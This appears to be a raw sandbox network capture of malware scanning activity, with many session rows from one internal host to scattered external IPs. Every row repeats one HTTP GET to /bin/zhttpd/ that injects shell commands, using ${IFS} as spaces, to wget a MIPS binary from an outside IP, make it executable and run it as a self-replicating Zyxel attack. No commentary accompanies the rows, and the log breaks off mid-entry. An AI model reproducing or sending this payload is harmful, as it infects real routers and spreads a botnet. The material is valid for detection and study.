                                            Feb 2, 2024 06:21:18.750586033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5908192.168.2.1552976208.106.193.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750650883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5909192.168.2.1542726157.9.144.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750675917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5910192.168.2.153294041.227.113.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750710964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5911192.168.2.154981867.111.236.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750761032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5912192.168.2.1557324139.103.251.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750791073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5913192.168.2.1553856194.231.154.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750848055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5914192.168.2.153454296.30.152.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.750894070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5915192.168.2.155940249.8.123.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.754609108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5916192.168.2.153600641.39.188.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762692928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5917192.168.2.1533542170.62.169.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762733936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5918192.168.2.155012288.92.73.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762774944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5919192.168.2.1544146185.238.247.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762829065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5920192.168.2.155554420.157.17.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762876987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5921192.168.2.1546342129.58.33.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762917995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5922192.168.2.153813253.158.73.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762943029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5923192.168.2.1548276132.202.196.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.762965918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5924192.168.2.153533292.241.130.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763000011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5925192.168.2.1535178156.236.111.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763022900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5926192.168.2.1553210106.110.185.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763078928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5927192.168.2.154346443.106.77.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763137102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5928192.168.2.1550834211.163.66.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763181925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5929192.168.2.155168847.22.216.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763226986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5930192.168.2.1538448191.71.72.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763256073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5931192.168.2.1535922120.209.76.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763283014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5932192.168.2.153757043.151.149.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763346910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5933192.168.2.1559050115.160.130.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763366938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5934192.168.2.1539924176.227.196.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763397932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5935192.168.2.1540022220.100.7.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763433933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5936192.168.2.1543948170.116.104.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763468981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5937192.168.2.153498614.65.136.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763505936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5938192.168.2.155345699.149.178.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763554096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5939192.168.2.1539394104.209.121.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763575077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5940192.168.2.156025083.82.132.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763654947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5941192.168.2.155700648.99.127.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763679981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5942192.168.2.154629476.236.240.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763729095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5943192.168.2.154699024.155.69.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763775110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5944192.168.2.155555434.70.172.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763804913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5945192.168.2.154628493.103.201.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763825893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5946192.168.2.153856886.37.33.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763844967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5947192.168.2.156096650.35.212.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763896942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5948192.168.2.1555996181.200.68.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763936043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5949192.168.2.1556928174.229.156.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.763958931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5950192.168.2.155407091.154.14.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764007092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5951192.168.2.1559058112.43.70.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764043093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5952192.168.2.1539816113.199.187.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764098883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5953192.168.2.1554982107.124.32.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764123917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5954192.168.2.1559904196.204.195.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764157057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5955192.168.2.154917681.104.138.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764188051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5956192.168.2.1547708183.171.237.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764234066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5957192.168.2.1543048118.183.154.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764271021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5958192.168.2.1539316118.215.48.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764333963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5959192.168.2.153784690.34.105.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764358044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5960192.168.2.1544908163.248.249.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764415979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5961192.168.2.15532449.85.102.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764440060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5962192.168.2.1549084171.140.59.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764502048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5963192.168.2.1540910102.71.28.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764527082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5964192.168.2.1535738221.25.48.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764553070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5965192.168.2.154338635.178.107.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764610052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5966192.168.2.1555352123.8.80.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764636993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5967192.168.2.155436649.190.36.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764683962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5968192.168.2.1556198180.61.255.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764720917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5969192.168.2.1533098146.45.19.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764753103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5970192.168.2.1550228218.20.92.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764800072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5971192.168.2.1546924141.46.244.39443
                                            TimestampBytes transferredDirectionData
